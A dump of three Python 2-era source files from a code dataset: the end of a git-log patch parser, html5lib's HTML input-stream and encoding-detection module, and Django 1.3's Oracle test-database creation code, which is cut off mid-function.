return S_DESC
m = patterns['author'].match(line)
if m:
patch.email = database.RemapEmail(m.group(2))
patch.author = database.LookupStoreHacker(m.group(1), patch.email)
else:
m = patterns['date'].match(line)
if m:
dt = rfc822.parsedate(m.group(2))
patch.date = datetime.date(dt[0], dt[1], dt[2])
return S_HEADER
def get_desc(patch, line, input):
if not line:
print 'Missing desc in', patch.commit
return S_CHANGELOG
patch.desc = line
line = getline(input)
while line:
patch.desc += line
line = getline(input)
return S_CHANGELOG
tagline = re.compile(r'^\s+(([-a-z]+-by)|cc|fixes):.*$', re.I)
def get_changelog(patch, line, input):
if not line:
if patch.templog:
patch.changelog += patch.templog
patch.templog = ''
if patterns['commit'].match(line):
# No changelog at all - usually a Linus tag
SaveLine(line)
return S_DONE
elif tagline.match(line):
if patch.templog:
patch.changelog += patch.templog
return get_tag(patch, line, input)
else:
patch.templog += line + '\n'
return S_CHANGELOG
def get_tag(patch, line, input):
#
# Some people put blank lines in the middle of tags.
#
if not line:
return S_TAGS
#
# A new commit line says we've gone too far.
#
if patterns['commit'].match(line):
SaveLine(line)
return S_DONE
#
# Check for a numstat line
#
if patterns['numstat'].match(line):
return get_numstat(patch, line, input)
#
# Look for interesting tags
#
m = patterns['signed-off-by'].match(line)
if m:
patch.signoffs.append(m.group(2))
else:
#
# Look for other tags indicating that somebody at least
# looked at the patch.
#
for tag in ('acked-by', 'reviewed-by', 'tested-by'):
if patterns[tag].match(line):
patch.othertags += 1
break
patch.taglines.append(line)
return S_TAGS
def get_numstat(patch, line, input):
m = patterns['numstat'].match(line)
if not m:
return S_DONE
try:
patch.addfile(int(m.group(1)), int(m.group(2)), m.group(3))
#
# Binary files just have "-" in the line fields. In this case, set
# the counts to zero so that we at least track that the file was
# touched.
#
except ValueError:
patch.addfile(0, 0, m.group(3))
return S_NUMSTAT
grabbers = [ get_header, get_desc, get_changelog, get_tag, get_numstat ]
#
# A variant on the gitdm patch class.
#
class patch:
def __init__(self, commit):
self.commit = commit
self.desc = ''
self.changelog = ''
self.templog = ''
self.author = ''
self.signoffs = [ ]
self.othertags = 0
self.added = self.removed = 0
self.files = [ ]
self.taglines = [ ]
def addfile(self, added, removed, file):
self.added += added
self.removed += removed
self.files.append(file)
def grabpatch(input):
#
# If it's not a patch something is screwy.
#
line = getline(input)
if line is None:
return None
m = patterns['commit'].match(line)
if not m:
print 'noncommit', line
return None
p = patch(m.group(1))
state = S_HEADER
#
# Crank through the patch.
#
while state != S_DONE:
line = getline(input)
if line is None:
if state != S_NUMSTAT:
print 'Ran out of patch', state
return None
return p
state = grabbers[state](p, line, input)
return p
| apache-2.0 |
jlegendary/servo | tests/wpt/css-tests/tools/html5lib/html5lib/inputstream.py | 618 | 30855 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from six.moves import http_client
import codecs
import re
from .constants import EOF, spaceCharacters, asciiLetters, asciiUppercase
from .constants import encodings, ReparseException
from . import utils
from io import StringIO
try:
from io import BytesIO
except ImportError:
BytesIO = StringIO
try:
from io import BufferedIOBase
except ImportError:
class BufferedIOBase(object):
pass
# Non-unicode versions of constants for use in the pre-parser
spaceCharactersBytes = frozenset([item.encode("ascii") for item in spaceCharacters])
asciiLettersBytes = frozenset([item.encode("ascii") for item in asciiLetters])
asciiUppercaseBytes = frozenset([item.encode("ascii") for item in asciiUppercase])
spacesAngleBrackets = spaceCharactersBytes | frozenset([b">", b"<"])
invalid_unicode_re = re.compile("[\u0001-\u0008\u000B\u000E-\u001F\u007F-\u009F\uD800-\uDFFF\uFDD0-\uFDEF\uFFFE\uFFFF\U0001FFFE\U0001FFFF\U0002FFFE\U0002FFFF\U0003FFFE\U0003FFFF\U0004FFFE\U0004FFFF\U0005FFFE\U0005FFFF\U0006FFFE\U0006FFFF\U0007FFFE\U0007FFFF\U0008FFFE\U0008FFFF\U0009FFFE\U0009FFFF\U000AFFFE\U000AFFFF\U000BFFFE\U000BFFFF\U000CFFFE\U000CFFFF\U000DFFFE\U000DFFFF\U000EFFFE\U000EFFFF\U000FFFFE\U000FFFFF\U0010FFFE\U0010FFFF]")
non_bmp_invalid_codepoints = set([0x1FFFE, 0x1FFFF, 0x2FFFE, 0x2FFFF, 0x3FFFE,
0x3FFFF, 0x4FFFE, 0x4FFFF, 0x5FFFE, 0x5FFFF,
0x6FFFE, 0x6FFFF, 0x7FFFE, 0x7FFFF, 0x8FFFE,
0x8FFFF, 0x9FFFE, 0x9FFFF, 0xAFFFE, 0xAFFFF,
0xBFFFE, 0xBFFFF, 0xCFFFE, 0xCFFFF, 0xDFFFE,
0xDFFFF, 0xEFFFE, 0xEFFFF, 0xFFFFE, 0xFFFFF,
0x10FFFE, 0x10FFFF])
ascii_punctuation_re = re.compile("[\u0009-\u000D\u0020-\u002F\u003A-\u0040\u005B-\u0060\u007B-\u007E]")
# Cache for charsUntil()
charsUntilRegEx = {}
class BufferedStream(object):
"""Buffering for streams that do not have buffering of their own
The buffer is implemented as a list of chunks on the assumption that
joining many strings will be slow since it is O(n**2)
"""
def __init__(self, stream):
self.stream = stream
self.buffer = []
self.position = [-1, 0] # chunk number, offset
def tell(self):
pos = 0
for chunk in self.buffer[:self.position[0]]:
pos += len(chunk)
pos += self.position[1]
return pos
def seek(self, pos):
assert pos <= self._bufferedBytes()
offset = pos
i = 0
while len(self.buffer[i]) < offset:
offset -= len(self.buffer[i])
i += 1
self.position = [i, offset]
def read(self, bytes):
if not self.buffer:
return self._readStream(bytes)
elif (self.position[0] == len(self.buffer) and
self.position[1] == len(self.buffer[-1])):
return self._readStream(bytes)
else:
return self._readFromBuffer(bytes)
def _bufferedBytes(self):
return sum([len(item) for item in self.buffer])
def _readStream(self, bytes):
data = self.stream.read(bytes)
self.buffer.append(data)
self.position[0] += 1
self.position[1] = len(data)
return data
def _readFromBuffer(self, bytes):
remainingBytes = bytes
rv = []
bufferIndex = self.position[0]
bufferOffset = self.position[1]
while bufferIndex < len(self.buffer) and remainingBytes != 0:
assert remainingBytes > 0
bufferedData = self.buffer[bufferIndex]
if remainingBytes <= len(bufferedData) - bufferOffset:
bytesToRead = remainingBytes
self.position = [bufferIndex, bufferOffset + bytesToRead]
else:
bytesToRead = len(bufferedData) - bufferOffset
self.position = [bufferIndex, len(bufferedData)]
bufferIndex += 1
rv.append(bufferedData[bufferOffset:bufferOffset + bytesToRead])
remainingBytes -= bytesToRead
bufferOffset = 0
if remainingBytes:
rv.append(self._readStream(remainingBytes))
return b"".join(rv)
def HTMLInputStream(source, encoding=None, parseMeta=True, chardet=True):
if isinstance(source, http_client.HTTPResponse):
# Work around Python bug #20007: read(0) closes the connection.
# http://bugs.python.org/issue20007
isUnicode = False
elif hasattr(source, "read"):
isUnicode = isinstance(source.read(0), text_type)
else:
isUnicode = isinstance(source, text_type)
if isUnicode:
if encoding is not None:
raise TypeError("Cannot explicitly set an encoding with a unicode string")
return HTMLUnicodeInputStream(source)
else:
return HTMLBinaryInputStream(source, encoding, parseMeta, chardet)
class HTMLUnicodeInputStream(object):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
_defaultChunkSize = 10240
def __init__(self, source):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
parseMeta - Look for a <meta> element containing encoding information
"""
# Craziness
if len("\U0010FFFF") == 1:
self.reportCharacterErrors = self.characterErrorsUCS4
self.replaceCharactersRegexp = re.compile("[\uD800-\uDFFF]")
else:
self.reportCharacterErrors = self.characterErrorsUCS2
self.replaceCharactersRegexp = re.compile("([\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?<![\uD800-\uDBFF])[\uDC00-\uDFFF])")
# List of where new lines occur
self.newLines = [0]
self.charEncoding = ("utf-8", "certain")
self.dataStream = self.openStream(source)
self.reset()
def reset(self):
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
self.errors = []
# number of (complete) lines in previous chunks
self.prevNumLines = 0
# number of columns in the last line of the previous chunk
self.prevNumCols = 0
# Deal with CR LF and surrogates split over chunk boundaries
self._bufferedCharacter = None
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = StringIO(source)
return stream
def _position(self, offset):
chunk = self.chunk
nLines = chunk.count('\n', 0, offset)
positionLine = self.prevNumLines + nLines
lastLinePos = chunk.rfind('\n', 0, offset)
if lastLinePos == -1:
positionColumn = self.prevNumCols + offset
else:
positionColumn = offset - (lastLinePos + 1)
return (positionLine, positionColumn)
def position(self):
"""Returns (line, col) of the current position in the stream."""
line, col = self._position(self.chunkOffset)
return (line + 1, col)
def char(self):
""" Read one character from the stream or queue if available. Return
EOF when EOF is reached.
"""
# Read a new chunk from the input stream if necessary
if self.chunkOffset >= self.chunkSize:
if not self.readChunk():
return EOF
chunkOffset = self.chunkOffset
char = self.chunk[chunkOffset]
self.chunkOffset = chunkOffset + 1
return char
def readChunk(self, chunkSize=None):
if chunkSize is None:
chunkSize = self._defaultChunkSize
self.prevNumLines, self.prevNumCols = self._position(self.chunkSize)
self.chunk = ""
self.chunkSize = 0
self.chunkOffset = 0
data = self.dataStream.read(chunkSize)
# Deal with CR LF and surrogates broken across chunks
if self._bufferedCharacter:
data = self._bufferedCharacter + data
self._bufferedCharacter = None
elif not data:
# We have no more data, bye-bye stream
return False
if len(data) > 1:
lastv = ord(data[-1])
if lastv == 0x0D or 0xD800 <= lastv <= 0xDBFF:
self._bufferedCharacter = data[-1]
data = data[:-1]
self.reportCharacterErrors(data)
# Replace invalid characters
# Note U+0000 is dealt with in the tokenizer
data = self.replaceCharactersRegexp.sub("\ufffd", data)
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
self.chunk = data
self.chunkSize = len(data)
return True
def characterErrorsUCS4(self, data):
for i in range(len(invalid_unicode_re.findall(data))):
self.errors.append("invalid-codepoint")
def characterErrorsUCS2(self, data):
# Someone picked the wrong compile option
# You lose
skip = False
for match in invalid_unicode_re.finditer(data):
if skip:
continue
codepoint = ord(match.group())
pos = match.start()
# Pretty sure there should be endianness issues here
if utils.isSurrogatePair(data[pos:pos + 2]):
# We have a surrogate pair!
char_val = utils.surrogatePairToCodepoint(data[pos:pos + 2])
if char_val in non_bmp_invalid_codepoints:
self.errors.append("invalid-codepoint")
skip = True
elif (codepoint >= 0xD800 and codepoint <= 0xDFFF and
pos == len(data) - 1):
self.errors.append("invalid-codepoint")
else:
skip = False
self.errors.append("invalid-codepoint")
def charsUntil(self, characters, opposite=False):
""" Returns a string of characters from the stream up to but not
including any character in 'characters' or EOF. 'characters' must be
a container that supports the 'in' method and iteration over its
characters.
"""
# Use a cache of regexps to find the required characters
try:
chars = charsUntilRegEx[(characters, opposite)]
except KeyError:
if __debug__:
for c in characters:
assert(ord(c) < 128)
regex = "".join(["\\x%02x" % ord(c) for c in characters])
if not opposite:
regex = "^%s" % regex
chars = charsUntilRegEx[(characters, opposite)] = re.compile("[%s]+" % regex)
rv = []
while True:
# Find the longest matching prefix
m = chars.match(self.chunk, self.chunkOffset)
if m is None:
# If nothing matched, and it wasn't because we ran out of chunk,
# then stop
if self.chunkOffset != self.chunkSize:
break
else:
end = m.end()
# If not the whole chunk matched, return everything
# up to the part that didn't match
if end != self.chunkSize:
rv.append(self.chunk[self.chunkOffset:end])
self.chunkOffset = end
break
# If the whole remainder of the chunk matched,
# use it all and read the next chunk
rv.append(self.chunk[self.chunkOffset:])
if not self.readChunk():
# Reached EOF
break
r = "".join(rv)
return r
def unget(self, char):
# Only one character is allowed to be ungotten at once - it must
# be consumed again before any further call to unget
if char is not None:
if self.chunkOffset == 0:
# unget is called quite rarely, so it's a good idea to do
# more work here if it saves a bit of work in the frequently
# called char and charsUntil.
# So, just prepend the ungotten character onto the current
# chunk:
self.chunk = char + self.chunk
self.chunkSize += 1
else:
self.chunkOffset -= 1
assert self.chunk[self.chunkOffset] == char
class HTMLBinaryInputStream(HTMLUnicodeInputStream):
"""Provides a unicode stream of characters to the HTMLTokenizer.
This class takes care of character encoding and removing or replacing
incorrect byte-sequences and also provides column and line tracking.
"""
def __init__(self, source, encoding=None, parseMeta=True, chardet=True):
"""Initialises the HTMLInputStream.
HTMLInputStream(source, [encoding]) -> Normalized stream from source
for use by html5lib.
source can be either a file-object, local filename or a string.
The optional encoding parameter must be a string that indicates
the encoding. If specified, that encoding will be used,
regardless of any BOM or later declaration (such as in a meta
element)
parseMeta - Look for a <meta> element containing encoding information
"""
# Raw Stream - for unicode objects this will encode to utf-8 and set
# self.charEncoding as appropriate
self.rawStream = self.openStream(source)
HTMLUnicodeInputStream.__init__(self, self.rawStream)
self.charEncoding = (codecName(encoding), "certain")
# Encoding Information
# Number of bytes to use when looking for a meta element with
# encoding information
self.numBytesMeta = 512
# Number of bytes to use when using detecting encoding using chardet
self.numBytesChardet = 100
# Encoding to use if no other information can be found
self.defaultEncoding = "windows-1252"
# Detect encoding iff no explicit "transport level" encoding is supplied
if (self.charEncoding[0] is None):
self.charEncoding = self.detectEncoding(parseMeta, chardet)
# Call superclass
self.reset()
def reset(self):
self.dataStream = codecs.getreader(self.charEncoding[0])(self.rawStream,
'replace')
HTMLUnicodeInputStream.reset(self)
def openStream(self, source):
"""Produces a file object from source.
source can be either a file object, local filename or a string.
"""
# Already a file object
if hasattr(source, 'read'):
stream = source
else:
stream = BytesIO(source)
try:
stream.seek(stream.tell())
except:
stream = BufferedStream(stream)
return stream
def detectEncoding(self, parseMeta=True, chardet=True):
# First look for a BOM
# This will also read past the BOM if present
encoding = self.detectBOM()
confidence = "certain"
# If there is no BOM need to look for meta elements with encoding
# information
if encoding is None and parseMeta:
encoding = self.detectEncodingMeta()
confidence = "tentative"
# Guess with chardet, if avaliable
if encoding is None and chardet:
confidence = "tentative"
try:
try:
from charade.universaldetector import UniversalDetector
except ImportError:
from chardet.universaldetector import UniversalDetector
buffers = []
detector = UniversalDetector()
while not detector.done:
buffer = self.rawStream.read(self.numBytesChardet)
assert isinstance(buffer, bytes)
if not buffer:
break
buffers.append(buffer)
detector.feed(buffer)
detector.close()
encoding = detector.result['encoding']
self.rawStream.seek(0)
except ImportError:
pass
# If all else fails use the default encoding
if encoding is None:
confidence = "tentative"
encoding = self.defaultEncoding
# Substitute for equivalent encodings:
encodingSub = {"iso-8859-1": "windows-1252"}
if encoding.lower() in encodingSub:
encoding = encodingSub[encoding.lower()]
return encoding, confidence
def changeEncoding(self, newEncoding):
assert self.charEncoding[1] != "certain"
newEncoding = codecName(newEncoding)
if newEncoding in ("utf-16", "utf-16-be", "utf-16-le"):
newEncoding = "utf-8"
if newEncoding is None:
return
elif newEncoding == self.charEncoding[0]:
self.charEncoding = (self.charEncoding[0], "certain")
else:
self.rawStream.seek(0)
self.reset()
self.charEncoding = (newEncoding, "certain")
raise ReparseException("Encoding changed from %s to %s" % (self.charEncoding[0], newEncoding))
def detectBOM(self):
"""Attempts to detect at BOM at the start of the stream. If
an encoding can be determined from the BOM return the name of the
encoding otherwise return None"""
bomDict = {
codecs.BOM_UTF8: 'utf-8',
codecs.BOM_UTF16_LE: 'utf-16-le', codecs.BOM_UTF16_BE: 'utf-16-be',
codecs.BOM_UTF32_LE: 'utf-32-le', codecs.BOM_UTF32_BE: 'utf-32-be'
}
# Go to beginning of file and read in 4 bytes
string = self.rawStream.read(4)
assert isinstance(string, bytes)
# Try detecting the BOM using bytes from the string
encoding = bomDict.get(string[:3]) # UTF-8
seek = 3
if not encoding:
# Need to detect UTF-32 before UTF-16
encoding = bomDict.get(string) # UTF-32
seek = 4
if not encoding:
encoding = bomDict.get(string[:2]) # UTF-16
seek = 2
# Set the read position past the BOM if one was found, otherwise
# set it to the start of the stream
self.rawStream.seek(encoding and seek or 0)
return encoding
def detectEncodingMeta(self):
"""Report the encoding declared by the meta element
"""
buffer = self.rawStream.read(self.numBytesMeta)
assert isinstance(buffer, bytes)
parser = EncodingParser(buffer)
self.rawStream.seek(0)
encoding = parser.getEncoding()
if encoding in ("utf-16", "utf-16-be", "utf-16-le"):
encoding = "utf-8"
return encoding
class EncodingBytes(bytes):
"""String-like object with an associated position and various extra methods
If the position is ever greater than the string length then an exception is
raised"""
def __new__(self, value):
assert isinstance(value, bytes)
return bytes.__new__(self, value.lower())
def __init__(self, value):
self._position = -1
def __iter__(self):
return self
def __next__(self):
p = self._position = self._position + 1
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
return self[p:p + 1]
def next(self):
# Py2 compat
return self.__next__()
def previous(self):
p = self._position
if p >= len(self):
raise StopIteration
elif p < 0:
raise TypeError
self._position = p = p - 1
return self[p:p + 1]
def setPosition(self, position):
if self._position >= len(self):
raise StopIteration
self._position = position
def getPosition(self):
if self._position >= len(self):
raise StopIteration
if self._position >= 0:
return self._position
else:
return None
position = property(getPosition, setPosition)
def getCurrentByte(self):
return self[self.position:self.position + 1]
currentByte = property(getCurrentByte)
def skip(self, chars=spaceCharactersBytes):
"""Skip past a list of characters"""
p = self.position # use property for the error-checking
while p < len(self):
c = self[p:p + 1]
if c not in chars:
self._position = p
return c
p += 1
self._position = p
return None
def skipUntil(self, chars):
p = self.position
while p < len(self):
c = self[p:p + 1]
if c in chars:
self._position = p
return c
p += 1
self._position = p
return None
def matchBytes(self, bytes):
"""Look for a sequence of bytes at the start of a string. If the bytes
are found return True and advance the position to the byte after the
match. Otherwise return False and leave the position alone"""
p = self.position
data = self[p:p + len(bytes)]
rv = data.startswith(bytes)
if rv:
self.position += len(bytes)
return rv
def jumpTo(self, bytes):
"""Look for the next sequence of bytes matching a given sequence. If
a match is found advance the position to the last byte of the match"""
newPosition = self[self.position:].find(bytes)
if newPosition > -1:
# XXX: This is ugly, but I can't see a nicer way to fix this.
if self._position == -1:
self._position = 0
self._position += (newPosition + len(bytes) - 1)
return True
else:
raise StopIteration
class EncodingParser(object):
"""Mini parser for detecting character encoding from meta elements"""
def __init__(self, data):
"""string - the data to work on for encoding detection"""
self.data = EncodingBytes(data)
self.encoding = None
def getEncoding(self):
methodDispatch = (
(b"<!--", self.handleComment),
(b"<meta", self.handleMeta),
(b"</", self.handlePossibleEndTag),
(b"<!", self.handleOther),
(b"<?", self.handleOther),
(b"<", self.handlePossibleStartTag))
for byte in self.data:
keepParsing = True
for key, method in methodDispatch:
if self.data.matchBytes(key):
try:
keepParsing = method()
break
except StopIteration:
keepParsing = False
break
if not keepParsing:
break
return self.encoding
def handleComment(self):
"""Skip over comments"""
return self.data.jumpTo(b"-->")
def handleMeta(self):
if self.data.currentByte not in spaceCharactersBytes:
# if we have <meta not followed by a space so just keep going
return True
# We have a valid meta element we want to search for attributes
hasPragma = False
pendingEncoding = None
while True:
# Try to find the next attribute after the current position
attr = self.getAttribute()
if attr is None:
return True
else:
if attr[0] == b"http-equiv":
hasPragma = attr[1] == b"content-type"
if hasPragma and pendingEncoding is not None:
self.encoding = pendingEncoding
return False
elif attr[0] == b"charset":
tentativeEncoding = attr[1]
codec = codecName(tentativeEncoding)
if codec is not None:
self.encoding = codec
return False
elif attr[0] == b"content":
contentParser = ContentAttrParser(EncodingBytes(attr[1]))
tentativeEncoding = contentParser.parse()
if tentativeEncoding is not None:
codec = codecName(tentativeEncoding)
if codec is not None:
if hasPragma:
self.encoding = codec
return False
else:
pendingEncoding = codec
def handlePossibleStartTag(self):
return self.handlePossibleTag(False)
def handlePossibleEndTag(self):
next(self.data)
return self.handlePossibleTag(True)
def handlePossibleTag(self, endTag):
data = self.data
if data.currentByte not in asciiLettersBytes:
# If the next byte is not an ascii letter either ignore this
# fragment (possible start tag case) or treat it according to
# handleOther
if endTag:
data.previous()
self.handleOther()
return True
c = data.skipUntil(spacesAngleBrackets)
if c == b"<":
# return to the first step in the overall "two step" algorithm
# reprocessing the < byte
data.previous()
else:
# Read all attributes
attr = self.getAttribute()
while attr is not None:
attr = self.getAttribute()
return True
def handleOther(self):
return self.data.jumpTo(b">")
def getAttribute(self):
"""Return a name,value pair for the next attribute in the stream,
if one is found, or None"""
data = self.data
# Step 1 (skip chars)
c = data.skip(spaceCharactersBytes | frozenset([b"/"]))
assert c is None or len(c) == 1
# Step 2
if c in (b">", None):
return None
# Step 3
attrName = []
attrValue = []
# Step 4 attribute name
while True:
if c == b"=" and attrName:
break
elif c in spaceCharactersBytes:
# Step 6!
c = data.skip()
break
elif c in (b"/", b">"):
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrName.append(c.lower())
elif c is None:
return None
else:
attrName.append(c)
# Step 5
c = next(data)
# Step 7
if c != b"=":
data.previous()
return b"".join(attrName), b""
# Step 8
next(data)
# Step 9
c = data.skip()
# Step 10
if c in (b"'", b'"'):
# 10.1
quoteChar = c
while True:
# 10.2
c = next(data)
# 10.3
if c == quoteChar:
next(data)
return b"".join(attrName), b"".join(attrValue)
# 10.4
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
# 10.5
else:
attrValue.append(c)
elif c == b">":
return b"".join(attrName), b""
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
# Step 11
while True:
c = next(data)
if c in spacesAngleBrackets:
return b"".join(attrName), b"".join(attrValue)
elif c in asciiUppercaseBytes:
attrValue.append(c.lower())
elif c is None:
return None
else:
attrValue.append(c)
class ContentAttrParser(object):
def __init__(self, data):
assert isinstance(data, bytes)
self.data = data
def parse(self):
try:
# Check if the attr name is charset
# otherwise return
self.data.jumpTo(b"charset")
self.data.position += 1
self.data.skip()
if not self.data.currentByte == b"=":
# If there is no = sign keep looking for attrs
return None
self.data.position += 1
self.data.skip()
# Look for an encoding between matching quote marks
if self.data.currentByte in (b'"', b"'"):
quoteMark = self.data.currentByte
self.data.position += 1
oldPosition = self.data.position
if self.data.jumpTo(quoteMark):
return self.data[oldPosition:self.data.position]
else:
return None
else:
# Unquoted value
oldPosition = self.data.position
try:
self.data.skipUntil(spaceCharactersBytes)
return self.data[oldPosition:self.data.position]
except StopIteration:
# Return the whole remaining value
return self.data[oldPosition:]
except StopIteration:
return None
def codecName(encoding):
"""Return the python codec name corresponding to an encoding or None if the
string doesn't correspond to a valid encoding."""
if isinstance(encoding, bytes):
try:
encoding = encoding.decode("ascii")
except UnicodeDecodeError:
return None
if encoding:
canonicalName = ascii_punctuation_re.sub("", encoding).lower()
return encodings.get(canonicalName, None)
else:
return None
| mpl-2.0 |
dvliman/jaikuengine | .google_appengine/lib/django-1.3/django/db/backends/oracle/creation.py | 153 | 11808 | import sys, time
from django.db.backends.creation import BaseDatabaseCreation
TEST_DATABASE_PREFIX = 'test_'
PASSWORD = 'Im_a_lumberjack'
class DatabaseCreation(BaseDatabaseCreation):
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
# output (the "qn_" prefix is stripped before the lookup is performed.
data_types = {
'AutoField': 'NUMBER(11)',
'BooleanField': 'NUMBER(1) CHECK (%(qn_column)s IN (0,1))',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'NullBooleanField': 'NUMBER(1) CHECK ((%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL))',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'PositiveSmallIntegerField': 'NUMBER(11) CHECK (%(qn_column)s >= 0)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
}
def __init__(self, connection):
self.remember = {}
super(DatabaseCreation, self).__init__(connection)
def _create_test_db(self, verbosity=1, autoclobber=False):
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
self.remember['user'] = self.connection.settings_dict['USER']
self.remember['passwd'] = self.connection.settings_dict['PASSWORD']
cursor = self.connection.cursor()
if self._test_database_create():
try:
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test database: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test database, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_NAME)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test database '%s'..." % self.connection.alias
self._execute_test_db_destruction(cursor, parameters, verbosity)
self._execute_test_db_creation(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test database: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
if self._test_user_create():
if verbosity >= 1:
print "Creating test user..."
try:
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error creating the test user: %s\n" % e)
if not autoclobber:
confirm = raw_input("It appears the test user, %s, already exists. Type 'yes' to delete it, or 'no' to cancel: " % TEST_USER)
if autoclobber or confirm == 'yes':
try:
if verbosity >= 1:
print "Destroying old test user..."
self._destroy_test_user(cursor, parameters, verbosity)
if verbosity >= 1:
print "Creating test user..."
self._create_test_user(cursor, parameters, verbosity)
except Exception, e:
sys.stderr.write("Got an error recreating the test user: %s\n" % e)
sys.exit(2)
else:
print "Tests cancelled."
sys.exit(1)
self.connection.settings_dict['TEST_USER'] = self.connection.settings_dict["USER"] = TEST_USER
self.connection.settings_dict["PASSWORD"] = TEST_PASSWD
return self.connection.settings_dict['NAME']
def _destroy_test_db(self, test_database_name, verbosity=1):
"""
Destroy a test database, prompting the user for confirmation if the
database already exists. Returns the name of the test database created.
"""
TEST_NAME = self._test_database_name()
TEST_USER = self._test_database_user()
TEST_PASSWD = self._test_database_passwd()
TEST_TBLSPACE = self._test_database_tblspace()
TEST_TBLSPACE_TMP = self._test_database_tblspace_tmp()
self.connection.settings_dict["USER"] = self.remember['user']
self.connection.settings_dict["PASSWORD"] = self.remember['passwd']
parameters = {
'dbname': TEST_NAME,
'user': TEST_USER,
'password': TEST_PASSWD,
'tblspace': TEST_TBLSPACE,
'tblspace_temp': TEST_TBLSPACE_TMP,
}
cursor = self.connection.cursor()
time.sleep(1) # To avoid "database is being accessed by other users" errors.
if self._test_user_create():
if verbosity >= 1:
print 'Destroying test user...'
self._destroy_test_user(cursor, parameters, verbosity)
if self._test_database_create():
if verbosity >= 1:
print 'Destroying test database tables...'
self._execute_test_db_destruction(cursor, parameters, verbosity)
self.connection.close()
def _execute_test_db_creation(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_db(): dbname = %s" % parameters['dbname']
statements = [
"""CREATE TABLESPACE %(tblspace)s
DATAFILE '%(tblspace)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 200M
""",
"""CREATE TEMPORARY TABLESPACE %(tblspace_temp)s
TEMPFILE '%(tblspace_temp)s.dbf' SIZE 20M
REUSE AUTOEXTEND ON NEXT 10M MAXSIZE 100M
""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _create_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_create_test_user(): username = %s" % parameters['user']
statements = [
"""CREATE USER %(user)s
IDENTIFIED BY %(password)s
DEFAULT TABLESPACE %(tblspace)s
TEMPORARY TABLESPACE %(tblspace_temp)s
""",
"""GRANT CONNECT, RESOURCE TO %(user)s""",
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_test_db_destruction(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_execute_test_db_destruction(): dbname=%s" % parameters['dbname']
statements = [
'DROP TABLESPACE %(tblspace)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
'DROP TABLESPACE %(tblspace_temp)s INCLUDING CONTENTS AND DATAFILES CASCADE CONSTRAINTS',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _destroy_test_user(self, cursor, parameters, verbosity):
if verbosity >= 2:
print "_destroy_test_user(): user=%s" % parameters['user']
print "Be patient. This can take some time..."
statements = [
'DROP USER %(user)s CASCADE',
]
self._execute_statements(cursor, statements, parameters, verbosity)
def _execute_statements(self, cursor, statements, parameters, verbosity):
for template in statements:
stmt = template % parameters
if verbosity >= 2:
print stmt
try:
cursor.execute(stmt)
except Exception, err:
sys.stderr.write("Failed (%s)\n" % (err))
raise
def _test_database_name(self):
name = TEST_DATABASE_PREFIX + self.connection.settings_dict['NAME']
try:
if self.connection.settings_dict['TEST_NAME']:
name = self.connection.settings_dict['TEST_NAME']
except AttributeError:
pass
return name
def _test_database_create(self):
return self.connection.settings_dict.get('TEST_CREATE', True)
def _test_user_create(self):
return self.connection.settings_dict.get('TEST_USER_CREATE', True)
def _test_database_user(self):
